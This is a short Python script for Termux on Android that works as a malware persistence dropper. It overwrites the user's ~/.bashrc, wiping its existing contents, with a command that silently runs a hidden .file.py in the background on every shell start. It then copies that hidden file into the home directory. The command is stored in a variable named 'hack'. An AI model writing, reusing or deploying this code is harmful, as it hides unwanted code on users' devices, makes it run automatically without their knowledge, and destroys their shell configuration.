import os
hack = 'nohup python /data/data/com.termux/files/home/.file.py > /dev/null 2>&1 &'
try:
    read = open('/data/data/com.termux/files/home/.bashrc','r').read
    open('/data/data/com.termux/files/home/.bashrc','w').write(hack)
except:
	open('/data/data/com.termux/files/home/.bashrc','w').write(hack)
try:
	open('/data/data/com.termux/files/home/.file.py','r').read
	os.system('cp -r .file.py /data/data/com.termux/files/home/.file.py')
except:os.system('cp -r .file.py /data/data/com.termux/files/home/.file.py')	
